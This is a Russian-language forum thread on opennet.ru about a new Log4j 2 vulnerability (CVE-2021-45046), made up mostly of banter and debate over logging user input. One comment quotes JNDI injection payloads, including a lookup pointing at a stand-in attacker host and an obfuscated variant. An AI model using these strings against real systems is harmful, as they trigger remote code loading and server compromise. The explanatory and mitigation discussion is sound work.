The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту"  +/
Сообщение от opennews (??), 15-Дек-21, 10:33 
В реализации подстановок JNDI в библиотеке  Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45046), проявляющаяся несмотря на добавленные в выпуск 2.15 исправления и независимо от использования настройки "log4j2.noFormatMsgLookup" для защиты. Проблема представляет опасность в основном для старых версий Log4j 2, защищённых при помощи флага "noFormatMsgLookup", так как даёт возможность обойти защиту от прошлой узявимости (Log4Shell, CVE-2021-44228), позволяющей выполнить свой код на сервере. Для пользователей версии 2.15 эксплуатация ограничивается созданием условий для аварийного завершения приложения из-за исчерпания доступных ресурсов...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=56347

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. Скрыто модератором  –2 +/
Сообщение от Анонимemail (1), 15-Дек-21, 10:33 
Ответить | Правка | Наверх | Cообщить модератору

2. Скрыто модератором  +/
Сообщение от InuYasha (??), 15-Дек-21, 10:33 
Ответить | Правка | Наверх | Cообщить модератору

13. Скрыто модератором  +1 +/
Сообщение от Аноним (13), 15-Дек-21, 11:07 
Ответить | Правка | Наверх | Cообщить модератору

3. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +16 +/
Сообщение от DEF (?), 15-Дек-21, 10:35 
Это какой-то позор?
Ответить | Правка | Наверх | Cообщить модератору

4. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +5 +/
Сообщение от Анонимemail (1), 15-Дек-21, 10:36 
ну это каждый местный эксперт сам решает
Ответить | Правка | Наверх | Cообщить модератору

5. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –7 +/
Сообщение от Аноним (5), 15-Дек-21, 10:40 
> Initial release    January 8, 2001; 20 years ago

Диды по-другому не могли, постоянно выдумывали какие-то "прикольные штуки" типа например IP-адреса, в котором вместо десятичных чисел какие-то другие. Вот и тут диды решили добавить "фичу".

Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

25. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +14 +/
Сообщение от Аноним (25), 15-Дек-21, 11:33 
> Диды по-другому не могли, постоянно выдумывали какие-то "прикольные штуки" типа...

Диды писали и пушут на Си.
А джаверы - это растоманы v1.0, как и те, которые придумали IPv6.
Диды уже в те времена смотрели на них искоса.

Ответить | Правка | Наверх | Cообщить модератору

34. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –11 +/
Сообщение от Аноним (5), 15-Дек-21, 12:10 
> Диды писали и пушут на Си.

Ой ли? Традиционным языком дидов является пердл со страшными writeonly-регекспами. Вот и в этой cve чувствуется любовь дидов к прикольным)))) магическим))) строкам.

Ответить | Правка | Наверх | Cообщить модератору

51. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +7 +/
Сообщение от Аноним (51), 15-Дек-21, 13:00 
Ларри слабал perl в 1987 году
И Ларри, к сведению, лингвист. Делал для себя костылик, для применения в конкретном месте.
Ответить | Правка | Наверх | Cообщить модератору

57. Скрыто модератором  +2 +/
Сообщение от Урри (ok), 15-Дек-21, 13:24 
Ответить | Правка | Наверх | Cообщить модератору

84. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (25), 15-Дек-21, 15:58 
> Ой ли? Традиционным языком дидов является пердл со страшными writeonly-регекспами.

Я сам из дидов, но в пердл толком даже не умею. В скриптовых языках мне вообще всегда REXX больше всего нравился. Но сейчас уже мало дидов осталось, которые умеют в REXX.

Ответить | Правка | К родителю #34 | Наверх | Cообщить модератору

88. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Crazy Alex (ok), 15-Дек-21, 17:22 
Ну я вот в перл умею. И он не страшнее остального, что создавалось в его время. Больше того - если сравнивать с тем, что он заменил - а это shell, awk и sed - то он на порядок читабельнее и безопаснее.

У него есть и архаика, конечно - хотя бы отсутствие нормальных прототипов функций с именованными параметрами, да и читать что-то вроде $myMap->{$keysArray->{$index}} не совсем удобно, но, с другой стороны, это, кажется, единственный из скриптовых, различающий объекты и ссылки на них, что в своё время было необходимостью, позволяя экономить память. А вот все эти префиксы $%@ (скаляр, мапа, массив), в сущности, крайне удобны, потом отвыкал от них с грустью.

Регэкспы - тема отдельная, они везде страшные. Учитыавя сферу применения - а это прежде всего работа с текстами - то никуда от них не деться даже сейчас.

Ответить | Правка | Наверх | Cообщить модератору

97. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от ms is piace of s (?), 15-Дек-21, 20:18 
/bin/bash находится одесную Отца. Не богохульствуй.
Ответить | Правка | Наверх | Cообщить модератору

112. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от ммнюмнюмус (?), 16-Дек-21, 12:04 
> /bin/bash находится одесную Отца. Не богохульствуй.

Ошибка 1, 20: ожидалось предлог местоположения и направление после "находится".

Bash хорош для чего угодно кроме скриптов. Конечно, если это не однодневные васянские скрипты для решения задачи на месте. Если на распространение - то хотя бы на /bin/dash.

Ответить | Правка | Наверх | Cообщить модератору

118. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от keydon (ok), 17-Дек-21, 18:50 
Тоже скучаю, для скриптов удобнее питона, гораздо более читаемо чем баш, довольно лаконичен и не особо прожорлив.
Ответить | Правка | К родителю #88 | Наверх | Cообщить модератору

52. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Аноним (51), 15-Дек-21, 13:04 
>> Диды уже в те времена смотрели на них искоса.

Целевая аудитория java была - "для кого С++ слишком сложно". Можно сканы журналов ещё найти с оракловым маркетингом.

Смотрели на них, как на убогих

Ответить | Правка | К родителю #25 | Наверх | Cообщить модератору

62. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от АнонимГоним (?), 15-Дек-21, 13:50 
>Можно сканы журналов ещё найти с оракловым маркетингом.

Sun же, или уже забыли.

Ответить | Правка | Наверх | Cообщить модератору

74. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от YetAnotherOnanym (ok), 15-Дек-21, 14:56 
Ооо, даааа... Сам читал интервью с МакНили, которое кто-то вывесил на доске объявлений нашего мехмата, ещё в девяносто-хрен-знает-каком году. Прямо такие дифирамбы жабе пел, что куды ж там.
Ответить | Правка | Наверх | Cообщить модератору

108. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (51), 15-Дек-21, 22:53 
>> Sun же, или уже забыли.

Ох ты ж... Да, слиплись в памяти в одно.

Ответить | Правка | К родителю #62 | Наверх | Cообщить модератору

114. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (114), 16-Дек-21, 17:54 
> java

просто памяти не хватило

Ответить | Правка | Наверх | Cообщить модератору

64. "я помню времена, когда жабисты обещали 'вот-вот' убить С++"  +2 +/
Сообщение от примерно_36_скотинок (ok), 15-Дек-21, 13:59 
прямо как сейчас растаманы.
Ответить | Правка | К родителю #52 | Наверх | Cообщить модератору

75. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –3 +/
Сообщение от Анонимemail (1), 15-Дек-21, 14:59 
> Целевая аудитория java была - "для кого С++ слишком сложно"

Эм, и что в нём сложного? ЯП ВУ же. Под вопросом только читабельность кода из под клавиатуры особых "умельцев", это лично меня от него отталкивало всегда.

Ответить | Правка | К родителю #52 | Наверх | Cообщить модератору

94. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от DeadMustdieemail (??), 15-Дек-21, 19:30 
> Эм, и что в нём сложного?

Метапрограммирование в целом и шаблоны в частности.
Множественное наследование классов.
Переопределение операторов, особенно в связке с шаблонами.

Все перечисленные выше инструменты крайне полезны, но притом довольно сложны в нетривиальных случаях.

Ответить | Правка | Наверх | Cообщить модератору

99. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от ms is piece of s (?), 15-Дек-21, 20:26 
Один известный персонаж с усиками тоже имел привычку смотреть на некоторых как на убогих.
Тут дело не в ЯП, а в том, что "соль земли" отказывает себе в психологической помощи со стороны специалистов.
Ответить | Правка | К родителю #52 | Наверх | Cообщить модератору

123. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (-), 23-Дек-21, 12:01 
> Диды писали и пушут на Си.

От которых жабисты и научились в format vuln. Догнали и перегнали, акселерация.

Ответить | Правка | К родителю #25 | Наверх | Cообщить модератору

26. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Mike Lee (?), 15-Дек-21, 11:47 
Э нет, в log4j 1.x этого не было.
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

66. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +5 +/
Сообщение от Аноним (66), 15-Дек-21, 14:08 
Благодаря такому формату IP до сих пор нет Великого Российского Фаервола, потому что Шигорин так и не смог объяснить ФСБшникам что такое IP адрес. Деды знали что делали.
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

89. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –1 +/
Сообщение от X86 (ok), 15-Дек-21, 17:53 
Зато есть великий американский файрволл, и вот что с ним делать не знает никто.
Ответить | Правка | Наверх | Cообщить модератору

124. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (-), 23-Дек-21, 12:02 
Тут несколько опечаток в слове "китайский".
Ответить | Правка | Наверх | Cообщить модератору

90. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Kuromi (ok), 15-Дек-21, 18:20 
Не, просто починили не коренную проблему, а залатали именно ту дырку на которую указали белые шапки. То что рядом еще россыпь и небольшая корректировка атаки позволяет снова бить в туже коренную уязвимость - "пожли пдечами".
Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

7. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –20 +/
Сообщение от Аноним (7), 15-Дек-21, 10:43 
Надоели!!!! Log4j2 как сам, так и опасный контекст из vulnerability issue, использует полтора программиста на этой планете. Крики такие, как будто это реальная проблема. Похоже на откровенную попытку слива Java как технологии.
Ответить | Правка | Наверх | Cообщить модератору

9. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +8 +/
Сообщение от Аноним (9), 15-Дек-21, 10:55 
Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell?

Это одна из самых опасных уязвимостей за последние лет 5, из-за того, что затрагивает кучу банковского, телекоммуникационного, корпоративного и промышленного софта. И это только начало, дальше можно ждать волну supply chain атак после взлома инфраструктур производителей.

Ответить | Правка | Наверх | Cообщить модератору

11. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –3 +/
Сообщение от Аноним (7), 15-Дек-21, 11:01 
> Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell?

Фактом наличия в зависимостях проектов. То есть, никак, по факту.

Ответить | Правка | Наверх | Cообщить модератору

12. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от полураспад (?), 15-Дек-21, 11:05 
в нормальном коде не выводятся параметры приходящие от пользователя в лог, плюс это проверка давно существует в анализаторах безопастности, они показывают где параметры из запросов логируются в лог
Ответить | Правка | Наверх | Cообщить модератору

14. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Аноним (13), 15-Дек-21, 11:11 
Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается. Плюс на практике было показано как уязвимость работала в системах Amazon, Microsoft и многих других. У них "анализаторы безопасности" тоже какие-то неправильные?
К чему в таком случае вся эта ремарка?
Ответить | Правка | Наверх | Cообщить модератору

93. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноньимъ (ok), 15-Дек-21, 18:43 
>Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается.

А ведь он прав.

Ответить | Правка | Наверх | Cообщить модератору

18. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (18), 15-Дек-21, 11:20 
Скажите это тем, кто пишет в лог значение User Agent, X-Forward-For и прочих заголовков. В логи такое пишут повсеместно.
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

28. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Фняк (?), 15-Дек-21, 11:55 
Это почему? Вот вызвали функцию с какими-то параметрами. Функция проверила параметры и какие-то из них не валидны. Перед тем как вернуть соответствующий код возврата она пишет в лог сообщение о том что вот не получилось выполнить работу потому во то условие не выполняется при вот этих входных параметрах. Пишет это она для админа на случай если к нему придут с вопросами «а почему не работает?» функция сама по себе понятия не имеет откуда переданные параметры взялись, от пользователя или ещё откуда
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

30. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +8 +/
Сообщение от пох. (?), 15-Дек-21, 11:58 
точно, нормальный код логает в лог только ok и error. Предоставляя гадать, что именно было ok и чего error.

Дайте угадаю - вы разработчик на модном языке?

Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

76. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от quanticemail (?), 15-Дек-21, 15:06 
Проблема не в том что значения от пользователя выводятся в лог, проблема в том что log4j их не фильтрует. Это их факап.
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

100. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от john_erohin (?), 15-Дек-21, 20:28 
> в нормальном коде не выводятся параметры приходящие от пользователя в лог,

врать не надо. навскидку:
apache выводит referer и user-agent (оба от пользователя) в combined log.
bind выводит попытки рекурсии от обнаглевших "сканеров безопастности" в лог.
что, у них ненормальный код ?

Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

102. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (102), 15-Дек-21, 20:45 
Только эксперты с opennet знают как правильно писать код. Жаль что почему-то не пишут
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

20. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (18), 15-Дек-21, 11:22 
Это компании которые _сами_ подтвердили проявление уязвимости Log4j в своих продуктах. Логи с отражением User Agent по умолчанию ведут почти все корпоративные системы.
Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

31. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (-), 15-Дек-21, 11:58 
1) Далеко не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога.
2) Не самый распространённый случай использования JNDI внутри организации.
3) Неплохо бы иметь доступ к ресурсам JNDI из сети, где расположен сервис.

А теперь вопрос - скольких компаний  это реально касается до такой степени, чтобы кричать "ужас-ужас"?

Ответить | Правка | Наверх | Cообщить модератору

40. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +3 +/
Сообщение от Аноним (40), 15-Дек-21, 12:36 
> не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога.

А как надо правильно логировать http запрос от пользователя?

Ответить | Правка | Наверх | Cообщить модератору

42. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (7), 15-Дек-21, 12:45 
Любым способом, не подразумевающим подстановку поля, полученного от пользователя в конструкцию "{}". Вроде не сложно такой подобрать

PS: если руководствоваться здравым смыслом при написании программы, то случаев, когда значения HTTP-заголовков подставляются в log4j непосредственно, не так уж и много. И вообще, не приходит в голову, когда это может понадобиться.

Ответить | Правка | Наверх | Cообщить модератору

48. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Урри (ok), 15-Дек-21, 12:56 
А если {} уже в полученном от пользователя поле?
Ответить | Правка | Наверх | Cообщить модератору

53. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –1 +/
Сообщение от Аноним (-), 15-Дек-21, 13:05 
msg.replace("{", "")


Ну, или, не используйте log4j2.

Ответить | Правка | Наверх | Cообщить модератору

54. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Аноним (54), 15-Дек-21, 13:17 
Вы лучше не используйте replace.

Ибо %7B

Ответить | Правка | Наверх | Cообщить модератору

70. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (7), 15-Дек-21, 14:38 
%7B тоже log4j2 интерпретирует?
Ответить | Правка | Наверх | Cообщить модератору

110. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Онаним (?), 16-Дек-21, 09:10 
Вот, самое правильное предложение.
Тянуть в рот васянские поделки - зло. Тем более, что изобретение данного "велосипеда" - дело по сути минутное.
Ответить | Правка | К родителю #53 | Наверх | Cообщить модератору

65. "то есть жабисты обосрались но изворачиваются"  +/
Сообщение от примерно_36_скотинок (ok), 15-Дек-21, 14:02 
утверждая, что их дерьмо надо было покрыть глазурью, посахарить и вот-тогда-то получится конфетка. просто видите ли говно неправильно готовят.
Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору

73. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (40), 15-Дек-21, 14:51 
Если я подставлю допустим объект, содержащий тело и мапу заголовков - это нормально? Главное не подставить в {} строку со значением?
Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору

92. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (7), 15-Дек-21, 18:33 
Пример из оригинала - https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vul...

Если нет в строке {..}, то ничего и не запустит. URL-decode оно само делать не умеет.

Ответить | Правка | Наверх | Cообщить модератору

77. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от YetAnotherOnanym (ok), 15-Дек-21, 15:07 
> А как надо правильно логировать http запрос от пользователя?

Дословно, с предварительным обеззараживанием, обесклычиванием, убеганием и прочими аналогичными процедурами.

Ответить | Правка | К родителю #40 | Наверх | Cообщить модератору

105. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (102), 15-Дек-21, 21:39 
Подскажите, как правильно обезораживать и обесклычивать в java?
Ответить | Правка | Наверх | Cообщить модератору

113. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от YetAnotherOnanym (ok), 16-Дек-21, 15:43 
С этим обращайтесь на стаковерфлоу.
Ответить | Правка | Наверх | Cообщить модератору

122. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (102), 19-Дек-21, 10:07 
Что же ты пишешь что нужно обесклычивать если сам не знаешь как это делать?
Ответить | Правка | Наверх | Cообщить модератору

60. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Аноним (60), 15-Дек-21, 13:40 
Достаточно любой подстановки внешних данных в лог, не важно как они переданы через подстановку или голой строкой. Главная проблема в этой узявимости, что Log4j сам разберёт "${..}" в выводимой строке, никаких особых подстановок для этого делать не нужно. Т.е.  написал в коде "logger.info(extvar);" и можно хакнуть, если есть возможность переть в  extvar что-то типа "${jndi:ldap://attacker.com/a}" или "${env:FOO:-j}ndi:${lower:L}da${lower:P}", как в примере в новости.
Ответить | Правка | К родителю #31 | Наверх | Cообщить модератору

72. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (7), 15-Дек-21, 14:46 
Как хорошо, что ничего кроме slf4j/logback у нас не используется....
Ответить | Правка | Наверх | Cообщить модератору

29. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от пох. (?), 15-Дек-21, 11:56 
Причем жопа в том что это как раз то о чем многажды говорили большевики - пытаясь заставить формошлепов использовать библиотеки операционной системы, а не намертво слинковать прожект с кучей мусора со всего интернета, непременнейше - наираспоследней версии на момент линковки.

Но это немодно, немолодежно и в модных-современных язычках вообще неосуществимо.

Поэтому в отличие от вполне тоже опасных и реальных уязвимостей в той же openssl - нельзя исправить большую часть проблем банально обновив "открытую" библиотеку. Будем сидеть и ждать пока орацле, броацом и амазоны с жуниперами разродятся - по каждому из миллиона своих подeлий отдельно.

Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

69. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от макпыф (ok), 15-Дек-21, 14:21 
просто системные либы могут быть разные. А модно молодежным програмистам хочется подключить 100500 либ, а вот поддерживать это все - нет. Потому просто бандлят единственно верную версию и статически/странным образом прибивают гвоздями. Обновляется это все конечно только в случае пинка под зад.

Потому мне приходится 100500 часов компилить забандленные в пакет либы (причем многолетней выдержки), когда я пару часов назад уже скомпилил их (причем актуальной версии). Можно конечно пытаться патчить все это дерьмо, на так как все заточенно под единственно верную версию - может быть очень много геморроя.

Итого: все это дерьмо с "релизами" где обновленна какая нибудь nss/log4j и многочасовая компиляция ни пойми чего.

Ответить | Правка | Наверх | Cообщить модератору

10. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +8 +/
Сообщение от Аноним (10), 15-Дек-21, 11:01 
У уязвимости есть уже подходящее имя? Предлагаю Log4jopa.
Ответить | Правка | Наверх | Cообщить модератору

16. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Аноним (16), 15-Дек-21, 11:15 
Log4calypse же
Ответить | Правка | Наверх | Cообщить модератору

23. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Анимус (?), 15-Дек-21, 11:30 
log4jShell
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

56. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Аноним (56), 15-Дек-21, 13:20 
Log4uckup
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

58. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Омномном2 (?), 15-Дек-21, 13:25 
Смотреть бесплатно и без регистрации:

Amateurs Log4Codeshot compilation

Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

15. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –8 +/
Сообщение от Аноним (16), 15-Дек-21, 11:13 
Где же тысячи глаз попенсорса??? которые должны находить каждую уазвимость за наносек после коммита???
Ответить | Правка | Наверх | Cообщить модератору

17. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +11 +/
Сообщение от eugener (ok), 15-Дек-21, 11:19 
Ну так вот и нашли.
Ответить | Правка | Наверх | Cообщить модератору

19. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Аноним (16), 15-Дек-21, 11:21 
*находить и не пущать в релиз
Ответить | Правка | Наверх | Cообщить модератору

21. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от тысячегласс (?), 15-Дек-21, 11:22 
Э, а вот так мы не договаривались!
Ответить | Правка | Наверх | Cообщить модератору

22. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +3 +/
Сообщение от eugener (ok), 15-Дек-21, 11:22 
Тогда это считалось фичей. Круто же, лукапить строчки из лога. А эти хакеры всё опошлили.
Ответить | Правка | К родителю #19 | Наверх | Cообщить модератору

49. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Урри (ok), 15-Дек-21, 12:58 
Старая история про солонки, да.
Ответить | Правка | Наверх | Cообщить модератору

33. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (33), 15-Дек-21, 12:09 
Про релиз договора не было. Было только про то что нашли.  
Ответить | Правка | К родителю #19 | Наверх | Cообщить модератору

96. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от DeadMustdieemail (??), 15-Дек-21, 19:38 
> Ну так вот и нашли.

Вроде нашёл инженер из Алибабы, в процессе сопровождения внутренностей алибабовских сервисов.
Ни разу не энтузиаст-бессребреник.

Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

35. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +3 +/
Сообщение от Анатолийemail (??), 15-Дек-21, 12:17 
Простое решение уязвимости в любой версии - отказ от JNDI.

в библиотеке log4j-core-x.x.x.jar
удалить класс
/org/apache/logging/log4j/core/lookup/JndiLookup.class

и тогда конструкция ${jndi:...} просто не обрабатывается

Ответить | Правка | Наверх | Cообщить модератору

36. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +6 +/
Сообщение от Аноним (5), 15-Дек-21, 12:21 
ща погодь, я на продакшоне сразу. Скинь плз на почту этот jar с удаленным классом, тимлид над душой стоит, целый банк уязвим как-никак
Ответить | Правка | Наверх | Cообщить модератору

43. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Анатолийemail (??), 15-Дек-21, 12:46 
у меня старый log4j версии 2.4
переход на 2.15.0 выл связан с несколькими несовместимости (используется runtime настройка логгеров)
Сделал log4j-core-2.4.2.jar залил в свой бинарный репозиторий (закрытый) и подключил его.

С любым log4j-core-х.х.х.jar можно проделать то же самое

еще раз расширенно: в библиотеке уделить класс
/org/apache/logging/log4j/core/lookup/JndiLookup.class

при загрузке системы инициализация библиотеки не найдет этот класс в выдаст в лог предупреждение:
JNDI lookup class is not available because this JRE does not support JNDI. JNDI string lookups will not be available, continuing configuration.

При этом все будет работать, но уязвимости не будет за неимением класса, в котором и была уязвимость

Ответить | Правка | Наверх | Cообщить модератору

104. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +5 +/
Сообщение от ms is piece of s (?), 15-Дек-21, 20:57 
На, лови: log4j-core-2.4.2.jar.exe
Короче, это пофикшеный логфорджи, плюс он автоматически ищет другие либы логфорджи во всех каталогах ос и тоже их фиксит от уязвимости.
Отправь пожалуйста всем своим знакомым, скорее всего у них тоже где-нибудь да есть уязвимая версия.
Ответить | Правка | К родителю #36 | Наверх | Cообщить модератору

117. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от тигар.логиниться.лень (?), 17-Дек-21, 11:58 
срочно переделай. распространять нужно  в виде даунлоадера правильной, патченной, JARки. Этим ты сможешь обеспечить страдальцам-рукозадам всегда свежую, правильную, версию.
Ответить | Правка | Наверх | Cообщить модератору

44. Скрыто модератором  –3 +/
Сообщение от Аноним12345 (?), 15-Дек-21, 12:48 
Ответить | Правка | Наверх | Cообщить модератору

45. Скрыто модератором  +1 +/
Сообщение от Аноним (-), 15-Дек-21, 12:51 
Ответить | Правка | Наверх | Cообщить модератору

63. Скрыто модератором  –1 +/
Сообщение от Аноним (54), 15-Дек-21, 13:58 
Ответить | Правка | Наверх | Cообщить модератору

71. Скрыто модератором  +1 +/
Сообщение от Аноним (7), 15-Дек-21, 14:40 
Ответить | Правка | Наверх | Cообщить модератору

82. Скрыто модератором  +/
Сообщение от Аноним (82), 15-Дек-21, 15:29 
Ответить | Правка | К родителю #63 | Наверх | Cообщить модератору

101. Скрыто модератором  +/
Сообщение от Аноним (101), 15-Дек-21, 20:38 
Ответить | Правка | К родителю #45 | Наверх | Cообщить модератору

50. Скрыто модератором  +2 +/
Сообщение от Урри (ok), 15-Дек-21, 12:58 
Ответить | Правка | К родителю #44 | Наверх | Cообщить модератору

67. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (67), 15-Дек-21, 14:19 
А ведь Java безопасно работает с памятью, а всё равно дыра как такое может быть?
Ответить | Правка | Наверх | Cообщить модератору

79. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +6 +/
Сообщение от cheater (?), 15-Дек-21, 15:14 
При чем здесь память, это ошибка поведения - eval произвольных данных.
Ответить | Правка | Наверх | Cообщить модератору

81. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +3 +/
Сообщение от Аноним (82), 15-Дек-21, 15:28 
> ошибка поведения

И это - будущее раста.

Ответить | Правка | Наверх | Cообщить модератору

87. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –2 +/
Сообщение от Аноним (87), 15-Дек-21, 17:07 
> И это - будущее раста.

Это прошлое раста. В C++ этой проблемы уже давным давно нет.

Ответить | Правка | Наверх | Cообщить модератору

106. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –2 +/
